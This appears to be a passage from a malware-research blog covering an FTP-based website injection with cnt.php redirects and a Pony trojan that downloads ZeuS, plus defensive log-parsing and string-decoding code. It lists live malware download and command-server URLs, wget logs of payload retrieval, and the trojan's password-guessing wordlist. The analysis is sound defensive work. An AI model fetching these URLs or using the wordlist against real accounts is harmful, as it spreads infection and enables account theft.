[2013/06/01 21:46:54] 71.89.72.41:   C="PASS (hidden)" B=- S=530
[2013/06/01 21:46:55] 83.138.146.85: C="USER USERNAME" B=- S=331
[2013/06/01 21:46:55] 83.138.146.85: C="PASS (hidden)" B=- S=230
[2013/06/01 21:46:55] 83.138.146.85: C="SYST" B=- S=215
[2013/06/01 21:46:55] 83.138.146.85: C="LIST /" D= B=211 S=226
[2013/06/01 21:46:56] 83.138.146.85: C="LIST public_html/" D= B=630 S=226
[2013/06/01 21:46:56] 83.138.146.85: C="LIST public_html/data/" D= B=124 S=226
[2013/06/01 21:46:57] 83.138.146.85: C="LIST public_html/images/" D= B=1219 S=226
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/06/01 21:46:59] 83.138.146.85: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/06/01 21:46:59] 83.138.146.85: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/06/01 21:47:00] 83.138.146.85: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/06/01 21:47:00] 83.138.146.85: C="STOR public_html/index.html-1" F=- B=- S=- T=-
[2013/06/01 21:47:00] 83.138.146.85: C="RETR public_html/TRAP.JS" F=/public_html/TRAP.JS B=2586 S=226 T=0.113
[2013/06/01 21:47:00] 83.138.146.85: C="STOR public_html/TRAP.JS" F=- B=- S=- T=-
[2013/06/01 21:47:01] 83.138.146.85: C="RETR public_html/TRAP.JS" F=/public_html/TRAP.JS B=2323 S=226 T=0.117
[2013/06/01 21:47:01] 83.138.146.85: C="STOR public_html/TRAP.JS" F=- B=- S=- T=-
[2013/06/01 21:47:02] 83.138.146.85: C="RETR public_html/data/.htaccess" F=/public_html/data/.htaccess B=125 S=226 T=0.141
[2013/06/01 21:47:02] 83.138.146.85: C="STOR public_html/data/.htaccess" F=- B=- S=- T=-

// EVENT #2:

[2013/06/04 11:53:05] 82.98.131.102: C="USER USERNAME" B=- S=331
[2013/06/04 11:53:05] 82.98.131.102: C="PASS (hidden)" B=- S=230
[2013/06/04 11:53:05] 82.98.131.102: C="SYST" B=- S=215
[2013/06/04 11:53:05] 117.26.78.57: C="PASS (hidden)" B=- S=530
[2013/06/04 11:53:06] 82.98.131.102: C="LIST public_html/" D= B=562 S=226
[2013/06/04 11:53:07] 82.98.131.102: C="STOR public_html//X9W7N2fm.gif" F=/public_html/X9W7N2fm.gif B=10 S=226 T=0.159
[2013/06/04 11:53:24] 82.98.131.102: C="DELE public_html//X9W7N2fm.gif" F=/public_html/X9W7N2fm.gif B=10 S=250 T=-
[2013/06/04 11:53:24] 82.98.131.102: C="STOR public_html/cgi-bin/X9W7N2fm.gif" F=/public_html/cgi-bin/X9W7N2fm.gif B=0 S=226 T=0.138
[2013/06/04 11:53:41] 82.98.131.102: C="DELE public_html/cgi-bin/X9W7N2fm.gif" F=/public_html/cgi-bin/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:53:41] 82.98.131.102: C="STOR public_html/data/X9W7N2fm.gif" F=/public_html/data/X9W7N2fm.gif B=0 S=226 T=0.153
[2013/06/04 11:53:58] 82.98.131.102: C="DELE public_html/data/X9W7N2fm.gif" F=/public_html/data/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:53:58] 82.98.131.102: C="STOR public_html/images/X9W7N2fm.gif" F=/public_html/images/X9W7N2fm.gif B=0 S=226 T=0.132
[2013/06/04 11:54:15] 82.98.131.102: C="DELE public_html/images/X9W7N2fm.gif" F=/public_html/images/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:54:16] 82.98.131.102: C="STOR public_html//index.html" F=/public_html/index.html B=15011 S=226 T=0.363
[2013/06/04 11:54:17] 82.98.131.102: C="RETR public_html/index.html" F=/public_html/index.html B=15011 S=226 T=0.363
[2013/06/04 11:54:17] 82.98.131.102: C="STOR public_html/TRAP.JS" F=/public_html/TRAP.JS B=6906 S=226 T=0.235
[2013/06/04 11:54:18] 82.98.131.102: C="STOR public_html/TRAP.JS" F=/public_html/TRAP.JS B=6711 S=226 T=0.234
[2013/06/04 11:54:19] 82.98.131.102: C="STOR public_html/data/.htaccess" F=/public_html/data/.htaccess B=1821 S=226 T=0.161
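
The automation signals in the two events above can be pulled out mechanically. The following is an added example (mine, not the author's tooling) that parses lines in the format shown and reports four things a scripted session leaves behind: a burst of commands from one IP that no human types, the same random file name written to several directories in a row (a writable-directory probe), a read-then-write of index.html/.js/.htaccess, and a successful login from a second IP right after a failed PASS from another. The embedded lines are a subset of EVENT #1 above; the thresholds are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Subset of the EVENT #1 lines from the post, used here as sample input.
FTP_LOG = """\
[2013/06/01 21:46:54] 71.89.72.41:   C="PASS (hidden)" B=- S=530
[2013/06/01 21:46:55] 83.138.146.85: C="USER USERNAME" B=- S=331
[2013/06/01 21:46:55] 83.138.146.85: C="PASS (hidden)" B=- S=230
[2013/06/01 21:46:55] 83.138.146.85: C="LIST /" D= B=211 S=226
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/06/01 21:46:59] 83.138.146.85: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/06/01 21:47:02] 83.138.146.85: C="RETR public_html/data/.htaccess" F=/public_html/data/.htaccess B=125 S=226 T=0.141
[2013/06/01 21:47:02] 83.138.146.85: C="STOR public_html/data/.htaccess" F=- B=- S=- T=-
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\] (?P<ip>[\d.]+):\s+'
    r'C="(?P<cmd>[^"]*)".*?\bS=(?P<status>\S+)'
)
SENSITIVE_RE = re.compile(r"(index\.html?|\.htaccess|\.js|\.php)$", re.I)

def parse_ftp_log(text):
    """One dict per line: timestamp, client IP, FTP verb, normalised path, reply code."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verb, _, arg = m.group("cmd").partition(" ")
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y/%m/%d %H:%M:%S"),
            "ip": m.group("ip"), "cmd": verb.upper(),
            "path": re.sub(r"/+", "/", arg),   # collapse the '//' the tool leaves behind
            "status": m.group("status"),
        })
    return events

def automation_indicators(events, window=timedelta(seconds=10)):
    """Return (kind, ip, detail) tuples; thresholds are my own choices."""
    findings = []
    per_ip = defaultdict(list)
    for e in events:
        per_ip[e["ip"]].append(e)
    for ip, evs in per_ip.items():            # 1. command rate no human types
        span = (evs[-1]["ts"] - evs[0]["ts"]).total_seconds()
        if len(evs) >= 10 and span <= 30:
            findings.append(("burst", ip, f"{len(evs)} commands in {span:.0f}s"))
    probes = defaultdict(list)                # 2. same name STORed into several dirs
    for e in events:
        if e["cmd"] == "STOR":
            d, _, name = e["path"].rpartition("/")
            probes[(e["ip"], name)].append((e["ts"], d))
    for (ip, name), hits in probes.items():
        dirs = {d for _, d in hits}
        if len(dirs) >= 3 and hits[-1][0] - hits[0][0] <= window:
            findings.append(("dir-probe", ip, f"{name} written to {len(dirs)} directories"))
    last_retr = {}                            # 3. fetch, patch, push back
    for e in events:
        key = (e["ip"], e["path"])
        if e["cmd"] == "RETR":
            last_retr[key] = e["ts"]
        elif e["cmd"] == "STOR" and SENSITIVE_RE.search(e["path"]):
            if key in last_retr and e["ts"] - last_retr[key] <= window:
                findings.append(("read-modify-write", e["ip"], e["path"]))
    last_fail = None                          # 4. login handed from one IP to another
    for e in events:
        if e["cmd"] != "PASS":
            continue
        if e["status"] == "530":
            last_fail = e
        elif (e["status"] == "230" and last_fail and e["ip"] != last_fail["ip"]
              and e["ts"] - last_fail["ts"] <= window):
            findings.append(("distributed-login", e["ip"], f"right after a 530 from {last_fail['ip']}"))
    return findings

if __name__ == "__main__":
    for kind, ip, detail in automation_indicators(parse_ftp_log(FTP_LOG)):
        print(f"{kind:18} {ip:16} {detail}")
```

Indicator 4 is the one worth keeping even on quiet servers: a PASS failure from one address followed within seconds by a success from another address using the same account is how stolen FTP credentials tried from a pool of proxies look, and it needs no knowledge of what the attacker uploads afterwards.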

Cookie and Redirection to cnt.php

The redirection URL is an interesting story; upon a direct access you'll get the "ok" data as per below:

--2013-06-05 03:26:36--  h00p://52weeksnc.com/cnt.php
Resolving 52weeksnc.com... seconds 0.00, 74.208.121.185
Caching 52weeksnc.com => 74.208.121.185
Connecting to 52weeksnc.com|74.208.121.185|:80... seconds 0.00, connected.
  :
GET /cnt.php HTTP/1.0
User-Agent: MalwareMustDie Ranted: Thou Salt Not Do (stupid) Hack!
Host: 52weeksnc.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 04 Jun 2013 18:26:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
  :
200 OK
Length: unspecified [text/html]
Saving to: `cnt.php'
2013-06-05 03:26:37 (21.3 KB/s) - `cnt.php' saved

$ cat cnt.php
ok
In the browser we'll see:

It doesn't show anything else but the "ok" at this point, but actually no one would hack just to redirect your site into an "ok", would they? Thanks to Amanda Pessi for the idea about the cookie used-->>See comment part

Redirection Target's IP Reputation

The IP's reputation is not so good; it is recorded as being badly used by the below "suspected" domains:

52weeksnc.com
williamstyler.com
www.trojanremovalguide.com
With the below PoC:
[1] [2] [3] [4]

The domain information suggests hacked domains; for the info:

Domain Name: 52WEEKSNC.COM
Registrar: 1 & 1 INTERNET AG
Whois Server: whois.schlund.info
Referral URL: http://1and1.com
Name Server: NS51.1AND1.COM
Name Server: NS52.1AND1.COM
Status: ok
Updated Date: 09-jul-2012
Creation Date: 09-jul-2012
Expiration Date: 09-jul-2013

domain:                          52weeksnc.com
created:                         09-Jul-2012
last-changed:                    09-Jul-2012
registration-expiration:         09-Jul-2013
nserver:                         ns51.1and1.com 217.160.80.164
nserver:                         ns52.1and1.com 217.160.81.164
status:                          CLIENT-TRANSFER-PROHIBITED

registrant-firstname:            Oneandone
registrant-lastname:             Private Registration
registrant-organization:         1&1 Internet, Inc. - http://1and1.com/contact
registrant-street1:              701 Lee Road, Suite 300
registrant-street2:              ATTN: 52weeksnc.com
registrant-pcode:                19087
registrant-state:                PA
registrant-city:                 Chesterbrook
registrant-ccode:                US
registrant-phone:                +1.8772064254
registrant-email:                proxy3497318@1and1-private-registration.com

AntiVirus Detection

Below is the scan for the detection ratio of each sample via VirusTotal:

1. Malicious Injected .htaccess:

SHA256:3b5e77fd3001f8040c308b751c2760c8aac0d0d8fe18a6abd98a93fa1b6497af
SHA1: c1925dcc1dc47b70bc62598d0c51312c5a256fa5
MD5: 5c65e586af2db49d7b93a1197734e82f
File size: 1.8 KB ( 1830 bytes )
File name: .htaccess
File type: Text
Tags: text
Detection ratio: 0 / 46
Analysis date: 2013-06-05 10:48:49 UTC ( 5 minutes ago )
It looks like no product can detect the injected .htaccess; the detection ratio is zero.

2. Injected Code (in Obfuscation)

SHA256: 8fa82809fb7f7c346188740cc71c86efa9419b536923159be39ad91f011f6c98
SHA1: 9f39f4875427ea3ec2b22182b8d34d5bf3c5574d
MD5: 95cfe5fc34b10272e9408517336b4cd3
File size: 4.3 KB ( 4389 bytes )
File name: obfuscation-redir-code.txt
File type: Text
Tags: text
Detection ratio: 16 / 47
Analysis date: 2013-06-05 10:49:08 UTC ( 7 minutes ago )

F-Secure                 : JS:Trojan.Crypt.MT
Microsoft                : Trojan:JS/BlacoleRef.DH
AntiVir                  : JS/BlacoleRef.CZ.20
Norman                   : Redirector.JX
McAfee-GW-Edition        : JS/Exploit-Blacole.ht
Avast                    : JS:Redirector-AOW [Trj]
nProtect                 : JS:Trojan.Crypt.MT
CAT-QuickHeal            : JS/BlacoleRef.CZB
Kaspersky                : Trojan.JS.Iframe.aen
BitDefender              : JS:Trojan.Crypt.MT
NANO-Antivirus           : Trojan.Script.Expack.brblya
McAfee                   : JS/Exploit-Blacole.ht
Fortinet                 : HTML/IFrame.AHQ!tr.dldr
GData                    : JS:Trojan.Crypt.MT
Emsisoft                 : JS:Trojan.Crypt.MT (B)
Comodo                   : Exploit.JS.Blacole.CW
This sample's detection ratio is not bad, but too bad that ClamAV, Sophos & Symantec can't detect it.. some of the unix systems I know are using them..

3. Injected Code (The Decode Version)

SHA256: 2b09050a02f996fc5dd9203a289ce60b41a885877da1edbdc36c2f3a4a36b631
SHA1: 35945fd0667a21b94f8a7e4cb0763a588de1c9bd
MD5: ce012905dc63ef14b619cdef98157949
File size: 1.3 KB ( 1338 bytes )
File name: decoded-redir-code.txt
File type: Text
Tags: text
Detection ratio: 10 / 47
Analysis date: 2013-06-05 10:49:26 UTC ( 10 minutes ago )

F-Prot                   : JS/IFrame.RS.gen
AntiVir                  : HTML/ExpKit.Gen3
Avast                    : JS:Iframe-AHW [Trj]
GData                    : JS:Iframe-AHW
Kaspersky                : HEUR:Trojan.Script.Generic
NANO-Antivirus           : Trojan.Script.Iframe.bopaxv
Fortinet                 : JS/Iframe.DCV!tr.dldr
Commtouch                : JS/IFrame.RS.gen
K7AntiVirus              : Riskware
AVG                      : HTML/Framer
This sample's detection ratio is only 10. Surprisingly, the plain decoded version of the obfuscated injection code cannot be detected by 6 products that could detect it previously; the reason is obvious: the detection ratios described above are signature-based only. That's it for VT, let's check/scan it with the beloved rkhunter...

Grabbed the latest version & updated the database..

$ date
Wed Jun  5 20:20:37 JST 2013

$ sudo /usr/local/bin/rkhunter --update
[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter data files...
  Checking file mirrors.dat                                  [ No update ]
  Checking file programs_bad.dat                             [ No update ]
  Checking file backdoorports.dat                            [ No update ]
  Checking file suspscan.dat                                 [ No update ]
  Checking file i18n/cn                                      [ No update ]
  Checking file i18n/de                                      [ No update ]
  Checking file i18n/en                                      [ No update ]
  Checking file i18n/zh                                      [ No update ]
  Checking file i18n/zh.utf8                                 [ No update ]
Put the injection code & .htaccess files in the path to be scanned by rkhunter and run it:
Performing check of known rootkit files and directories
    55808 Trojan - Variant A                                 [ Not found ]
    ADM Worm                                                 [ Not found ]
    AjaKit Rootkit                                           [ Not found ]
    Adore Rootkit                                            [ Not found ]
    aPa Kit                                                  [ Not found ]
    Apache Worm                                              [ Not found ]
    Ambient (ark) Rootkit                                    [ Not found ]
    Balaur Rootkit                                           [ Not found ]
    BeastKit Rootkit                                         [ Not found ]
    beX2 Rootkit                                             [ Not found ]
    BOBKit Rootkit                                           [ Not found ]
       [...]                                                     [...]
    Trojanit Kit                                             [ Not found ]
    Turtle Rootkit                                           [ Not found ]
    Tuxtendo Rootkit                                         [ Not found ]
    URK Rootkit                                              [ Not found ]
    Vampire Rootkit                                          [ Not found ]
    VcKit Rootkit                                            [ Not found ]
    Volc Rootkit                                             [ Not found ]
    Xzibit Rootkit                                           [ Not found ]
    zaRwT.KiT Rootkit                                        [ Not found ]
    ZK Rootkit                                               [ Not found ]
Performing additional rootkit checks
    Checking for possible rootkit files and directories      [ None found ]
       [...]                                                     [...]
Yes, rkhunter cannot detect these threats.

How many more cnt.php threats are on the internet now?

Today our team detected the below redirection of cnt.php:

[...]
05.06.13 00:12 - brandt-siefart.de/cnt.php - 87.106.116.213 - Referrer: h00p://ibc2013.org/
05.06.13 00:14 - miltonrefs.ca/minutes/cnt.php - 96.125.166.238 - Referrer: 
05.06.13 00:17 - www.vmix.cz/sqc/cnt.php - 46.28.105.60 - Referrer: h00p://gezondeogen.nl/
05.06.13 00:23 - krakownoclegi.org/cnt.php - 62.75.153.123 - Referrer: h00p://www.meineaktion.de/browse_all_end.php?SESSION_ID=c89652a733c34b3ee927fb9b923c8afd
05.06.13 00:28 - fraukesart.de/cnt.php - 80.67.28.150 - Referrer: h00p://www.druckerei-daemmig.de/favicon.ico
05.06.13 00:48 - www.baru.it/cnt.php - 62.149.142.35 - Referrer: h00p://karbon4ik.ru/novosti/gai
05.06.13 01:21 - markbruinink.nl/wp-admin/cnt.php - 46.244.13.6 - Referrer: h00p://magaliescountryhotel.co.za/
05.06.13 02:00 - 52weeksnc.com/cnt.php - 74.208.121.185 - Referrer: h00p://google.com/
05.06.13 02:02 - www.vmix.cz/sqc/cnt.php - 46.28.105.60 - Referrer: h00p://www.gezondeogen.nl/
05.06.13 02:12 - www.baru.it/cnt.php - 62.149.142.35 - Referrer: h00p://karbon4ik.ru/novosti/page/2
05.06.13 02:15 - www.zaxtv.net/wp-admin/cnt.php - 97.74.215.167 - Referrer: h00p://facilitec.com/
05.06.13 02:38 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/welcome/about/brittney-pokorzynski/
05.06.13 03:21 - 52weeksnc.com/cnt.php - 74.208.121.185 - Referrer: 
05.06.13 03:24 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2011/03/24/big-news/
05.06.13 03:25 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/remodeling/
05.06.13 04:00 - www.mickmusic.eu/cnt.php - 79.99.164.4 - Referrer: 
05.06.13 04:02 - www.mickmusic.eu/cnt.php - 79.99.164.4 - Referrer: 
05.06.13 04:14 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/testimonials/resources/
05.06.13 04:27 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2010/12/02/this-is-a-test/
05.06.13 04:34 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/tips/
05.06.13 04:36 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2012/04/10/no-time-better-than-now/
05.06.13 04:50 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/news/
05.06.13 05:03 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/staging-2/
05.06.13 05:06 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/welcome/about/
05.06.13 05:09 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/contact/
05.06.13 05:26 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/staging/rental-inventory
The overall log of cnt.php redirections is a bit big, so please see it in this pastebin here-->>[Pastebin] (Big thanks to @Set_Abominae for the sorting). The name "cnt.php" itself fakes the benign counter filename commonly used in PHP programming, suspected to be chosen to avoid tracing. So dorking sites with "cnt.php" in Google will result in a huge number of false positives.

Epilogue

So if you read this post and you can enlighten us on the cookies and cnt.php matter (we know pretty well about the mod_rewrite.c redirection matter, thank you) please poke me on twitter or write a comment. This case is not new and happens a lot on our beloved internet; Sucuri Labs has a good database on these injections & redirections, the link is here-->>[Google Dork]. In addition, if you happen to be infected/injected, Alex (Aliaksandr Hartsuyeu) of eVuln.com has written a good tutorial, "Malicious Redirects - Common Fixing Guide v1", here-->>[eVuln.com]

Furthermore, I really hope to be visited by the other "visitor" next time, so stay tuned! :-)

PS: it really feels GOOD to hear a moronz cry after I posted this. :D

#MalwareMustDie!

Tuesday, June 4, 2013

Case of Pony downloading ZeuS via Passworded Zip Attachment of Malvertisement Campaign

It is a workday so I cannot post much, so please bear with the below short analysis. But today I can't get rid of my curiosity after reading Mr. Conrad Longmore's newest post on the Dynamoo Blog (nice report!) about the malvertisement with an encrypted/passworded zip attachment (here's the link -->>[Dynamoo Blog]).
I got lucky to have a similar sample with today's date in my honeypot, as per the following snapshot, and just can't help taking a look into it..

The email header shows the spambot signatures:
Date: Mon, 3 Jun 2013 09:45:57 -0800
From: "Fiserv Secure Notification" 
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20110929 Thunderbird/7.0.1"
MIME-Version: 1.0
And the passworded archive as attachment like the below snapshot:

And filling in the provided information will lead you to the sample here-->>[VirusTotal]
This time it looks like VirusTotal did only a limited behavior analysis on the sample, so I decided to check it myself.

I renamed the malicious attachment to sample2.exe and ran it; as seen in the decrypted binary code, it connected to the below pony gateways:

h00p://116.122.158.195:8080/ponyb/gate.php
h00p://nourrirnotremonde.org/ponyb/gate.php
h00p://zoecopenhagen.com/ponyb/gate.php
h00p://goldenstatewealth.com/ponyb/gate.php
OK, it is a Pony trojan, a credential stealer & downloader. It downloaded other malware from the below URL set (gotta hack the bins to know these too); later on I learned it is Zbot:
h00p://www.netnet-viaggi.it/2L6L.exe
h00p://190.147.81.28/yqRSQ.exe
h00p://paulcblake.com/ngY.exe
h00p://207.204.5.170/PXVYGJx.exe
The processes after downloading look like this:

With some successful downloaded logs I recorded (for evidence purpose):
--2013-06-04 17:40:46--  h00p://190.147.81.28/yqRSQ.exe
Connecting to 190.147.81.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `yqRSQ.exe'
100%[=====================>] 305,664     95.4K/s   in 3.1s
2013-06-04 17:40:51 (95.4 KB/s) - `yqRSQ.exe' saved [305664/305664]

--2013-06-04 17:40:59--  h00p://paulcblake.com/ngY.exe
Resolving paulcblake.com... 74.54.147.146
Connecting to paulcblake.com|74.54.147.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `ngY.exe'
100%[=====================>] 305,664      144K/s   in 2.1s
2013-06-04 17:41:02 (144 KB/s) - `ngY.exe' saved [305664/305664]

--2013-06-04 17:41:15--  h00p://207.204.5.170/PXVYGJx.exe
Connecting to 207.204.5.170:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `PXVYGJx.exe'
100%[=====================>] 305,664      109K/s   in 2.7s
2013-06-04 17:41:18 (109 KB/s) - `PXVYGJx.exe' saved [305664/305664]
And then the daemonized pony malware started:

You'll see the self-copy traces of the original malware (pony) and the downloaded one saved in %Temp% and %AppData% as per the below snapshot; note the randomized file names and the fake dates:

So we actually have two malwares in this case: the attached file is the ZeuS-based PWS/pony botnet agent, which downloads the trojan PWS/Stealer. Let's break it down one by one.

The Pony

The binary is compressed with aPLib v1.01; the traces are here:

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
It checks some basic info on your system, "System Data.."
GetNativeSystemInfo
IsWow64Process
HWID

"... and User's Data"
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
[...]
Then it tried to grab your FTP software, browser, email, terminal server and file-sharing credential data, as I pasted in pastebin here -->>[Pastebin]

It even attempts to access Facebook-related data. The code was readable :-)

xthpt/:w/wwf.cabeoo.koc/m
// Means:
http://www.facebook.com/
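
The string above is a simple transposition: every two adjacent characters are swapped, and the leading "x" is one extra byte in front of the even-length body (I take it to be a prefix marker; that is an inference from this single sample, not something the binary documents). The following is an added example, not code from the post, that undoes the swap and scans a list of constructed strings for entries that only turn into URLs after the swap:

```python
import re

def unswap_pairs(s, prefix_len=0):
    """Swap every adjacent pair of characters after dropping prefix_len bytes.
    The operation is an involution: applying it twice restores the input."""
    body = s[prefix_len:]
    out = []
    for i in range(0, len(body) - 1, 2):
        out.append(body[i + 1])
        out.append(body[i])
    if len(body) % 2:            # an odd trailing character stays in place
        out.append(body[-1])
    return "".join(out)

URL_RE = re.compile(r"^https?://[\w.-]+")

def find_hidden_urls(strings):
    """For each string, try the swap with and without a one-byte prefix and
    report the ones that only look like a URL after unswapping."""
    hits = []
    for s in strings:
        if URL_RE.match(s):
            continue             # already plain; nothing hidden
        for prefix_len in (0, 1):
            decoded = unswap_pairs(s, prefix_len)
            if URL_RE.match(decoded):
                hits.append((s, decoded, prefix_len))
                break
    return hits

# Constructed list in the style of a strings(1) dump; the second entry is the
# string quoted in the post, the others are plain strings also listed there.
SAMPLE_STRINGS = [
    "GetNativeSystemInfo",
    "xthpt/:w/wwf.cabeoo.koc/m",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",
    "STATUS-IMPORT-OK",
]

if __name__ == "__main__":
    for original, decoded, skipped in find_hidden_urls(SAMPLE_STRINGS):
        print(f"{original!r} -> {decoded!r} (prefix bytes skipped: {skipped})")
```

Because the swap is its own inverse, the same function serves for checking a candidate in both directions; the scan tries the zero- and one-byte prefix so that a sample which does not carry the leading marker is still caught.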
HTTP/1.0 POST communication's header, decoded:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HTTP/1.0 GET communication's header, decoded:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
Strings for logins :-)
diamond        jason          scooby         thomas     maxwell        whatever       cheese         asdf    
hope           internet       joseph         blink182   justin         god            sunshine       banana  
maggie         mustdie        genesis        jasmine    james          password       christ         gates   
maverick       john           forum          purple     chicken        blessing       soccer         flower  
online         letmein        emmanuel       test       danielle       snoopy         qwerty1        taylor  
spirit         mike           cassie         angels     iloveyou2      1q2w3e4r       friend         lovely  
george         knight         victory        grace      fuckoff        cookie         summer         hannah  
friends        jordan23       passw0rd       hello      prince         chelsea        merlin         princess
dallas         abc123         foobar         poop       junior         pokemon        phpbb          compaq  
adidas         red123         ilovegod       blessed    rainbow        hahaha         jordan         jennifer
1q2w3e         praise         nathan         heaven     fuckyou1       aaaaaa         saved          myspace1
orange         freedom        blabla         hunter     nintendo       hardcore       dexter         smokey  
testtest       jesus1         digital        pepper     peanut         shadow         viper          matthew 
asshole        london         peaches        john316    none           welcome        winner         harley  
apple          computer       football1      cool       church         mustang        sparky         rotimi  
biteme         microsoft      power          buster     bubbles        bailey         windows        fuckyou 
william        muffin         thunder        andrew     robert         blahblah       123abc         soccer1 
mickey         qwert          gateway        faith      destiny        matrix         lucky          single  
asdfgh         mother         iloveyou!      ginger     loving         jessica        anthony        joshua  
wisdom         master         football       hockey     gfhjkm         stella         jesus          green   
batman         qazwsx         tigger         hello1     mylove         benjamin       ghbdtn         123qwe  
michelle       samuel         corvette       angel1     jasper         testing        admin          starwars
david          canada         angel          superman   hallo          secret         hotdog         love    
eminem         slayer         killer         enter      cocacola       trinity        baseball       silver  
scooter        rachel         creative       daniel     helpme         richard        password1      austin  
asdfasdf       onelove        google         forever    nicole         peace          dragon         michael 
sammy          qwerty         zxcvbnm        nothing    guitar         shalom         trustno1       amanda  
baby           prayer         startrek       dakota     billgates      monkey         chris          charlie 
samantha       iloveyou1      ashley         kitten     looking        iloveyou       happy          bandit  
Malicious WSA-based botnet calls used:
Client Hash
STATUS-IMPORT-OK
gethostbyname
socket
connect
closesocket
send
select
recv
setsockopt
Some PoC of request vs response of this binary's networking:

The Stealer is... Trojan ZeuS Botnet Agent (Zbot)

I analyzed a sample like this in the recent popular malvertisement campaign, as I pasted here -->>[Pastebin]. This one is of the same kind, with the below highlights:

Process injection target:

launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
Usual strings:
bancline
fidelity
micrsolv
bankman
vantiv
episys
jack henry
cruisenet
gplusmain
Encoding ROT traces:
abcdefghijklmnopqrstuvwxyz
^_`abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
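
The fourth line of these traces deserves a second look: it is 80 characters long, and read as a table indexed from the character '+' (the lowest base64 character), where each entry stores (alphabet index + 0x3E) and '$' marks characters outside the alphabet, it maps every standard base64 character to its own index. In other words it is a base64 decoding lookup table rather than a rotation; the two lines after it are the lowercase and swapcase translation tables. This is an added example (not the author's tooling); the layout constants are inferences from the string itself, and the code verifies them and then decodes with nothing but the recovered table.

```python
import string

# The fourth "ROT trace" line, copied from the post.
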